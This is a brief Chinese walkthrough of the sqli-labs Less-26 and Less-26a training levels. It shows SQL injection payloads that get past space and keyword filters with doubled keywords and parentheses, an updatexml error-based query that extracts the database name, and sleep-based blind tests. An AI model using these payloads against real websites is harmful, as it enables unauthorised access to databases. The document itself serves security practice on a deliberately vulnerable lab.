sqli-labs靶场less26/a
less26
1.我们打开这一关来看一下,他提示我们空格和其他一些什么都被过滤了
2.我们来尝试绕过,按照之前的做法,可以看到闭合方式为单引号,并且过滤了--与#
3.我们来尝试绕过一下,发现可以以下的方式绕过,空格用()代替
?id=1' aandnd(updatexml(1,concat(1,(select(database()))),1)) aandnd '1'='1
4.既然报错注入这样可以,那么就按这样的方式往出做就可以
less26a
1.这一关与上一关的区别是这一关闭合方式为 ') ,另外可以使用时间盲注来判断
id=1')anandd(if(length(database())>7,sleep(3),1))anandd('1')=('1
id=1')anandd(if(length(database())>8,sleep(3),1))anandd('1')=('1
2.剩余的内容可以接着利用时间盲注的方式往下做